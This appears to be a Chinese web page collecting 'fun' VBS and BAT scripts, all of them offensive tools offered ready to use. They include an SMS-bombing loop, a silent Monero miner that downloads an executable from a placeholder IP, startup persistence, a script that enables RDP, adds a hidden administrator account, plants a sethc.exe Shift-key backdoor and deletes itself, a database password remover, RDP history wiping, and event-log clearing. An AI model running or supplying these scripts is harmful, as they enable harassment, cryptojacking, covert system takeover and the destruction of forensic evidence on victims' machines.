各類有趣vbs,bat腳本

短信轟炸.vbsphp

Dim btn,ie
Set ie = WScript.CreateObject("InternetExplorer.Application")
ie.Visible = true    '若爲false,則不顯示瀏覽器
ie.navigate "http://www.dooccn.com/php7/#id/53e57045ca9d15fe"   'http://www.dooccn.com/php7/#id/f16690b98a87d61c72e8a09fac740a53進去把15555555555換成你想要炸的號碼,而後點擊分享當前代碼。把分享代碼的鏈接複製進目標鏈接就OK了
Do                    'Do Loop 是一個循環結構
Do
Wscript.Sleep 200
Loop Until ie.readyState = 4    '等頁面載入完整再填登陸數據登陸
Set btn =ie.Document.getElementById("btn")
btn.click
Wscript.Sleep 5000     '每隔五秒轟炸一次
Loop

門羅幣挖礦.vbsshell

Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP") 
objXMLHTTP.open "GET","http://xxx.xxx.xxx.xxx/mdx.exe",false '後臺下載挖礦軟件mdx.exe
objXMLHTTP.send()
If objXMLHTTP.Status=200 Then
Set objADOStream=CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type=1 
objADOzStream.Write objXMLHTTP.ResponseBody
objADOStream.Position=0 
objADOStream.SaveToFile "mdx.exe"
objADOStream.Close
Set objADOStream=Nothing
End if
Set objXMLHTTP=Nothing
Set objShell=CreateObject("WScript.Shell")               '後臺挖礦
objShell.Run"mdx.exe -o stratum+tcp://xxxxxxxx.com:3333 -u 46E9UkTFqALXNh2mSbAfskfsVgUgPVdT9ZdtweLRvAhWmbvuY1dh5ZRb4qJzFXLVHGYH4moQ -p x",0,TRUE

開機自啓.vbs瀏覽器

dim fso,ws,pt,msg   '把這個加到你vbs的最前面
set fso = createobject("scripting.filesystemobject")
set ws = createobject("wscript.shell")
set file = fso.getfile(wscript.scriptfullname)
pt = ws.specialfolders("startup")&"\"
file.copy pt
sub Close_Process(ProcessName)
On Error Resume Next
end sub

開3389+非net建立管理用戶+Shift後門+自刪除腳本.vbsphp7

on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_ 
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
on error resume next
dim username,password:If Wscript.Arguments.Count  Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="0x7863$":password="3253220":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

BY:c32 QQȺ:43910940  

BLOG:www.19aq.com

 

 

去密碼.vbsapp

Set args = WScript.Arguments
if args.count<>1 then msgbox "db.mdb":wscript.quit
Set conn =CreateObject("ADODB.Connection")
pwd=""&chr(13)&chr(9)&chr(10)&""&chr(2)
connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & args(0)&" ;Mode=Share Deny Read|Share Deny Write;Persist Security Info=False;Jet OLEDB:Database Password="&pwd&";"
conn.open connstr
conn.execute("ALTER DATABASE Password [123456] ["&pwd&"]")
conn.close
msgbox "done"

 清除3389遠程桌面鏈接痕跡.battcp

@echo off
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
@del "%USERPROFILE%\My Documents\Default.rdp" /a
@exit

 清除日誌.batide

@echo off
choice /t 60 /d y /n >nul      '延遲60秒執行
echo
on error resume next>clear.vbs echo set wmi_clear=getobject("winmgmts:\\.\root\cimv2")>>clear.vbs echo dim lianan_names(2)>>clear.vbs echo lianan_names(0)="application">>clear.vbs echo lianan_names(1)="security">>clear.vbs echo lianan_names(2)="system">>clear.vbs echo for each lianan_name in lianan_names>>clear.vbs echo set lianan_logs=wmi_clear.execquery("select * from win32_nteventlogfile where logfilename='"^&lianan_name^&"'")>>clear.vbs echo for each lianan_log in lianan_logs>>clear.vbs echo lianan_log.cleareventlog()>>clear.vbs echo next>>clear.vbs echo next>>clear.vbs clear.vbs del /f /q clear.vbs del %0 '刪除自己 exit
相關文章
相關標籤/搜索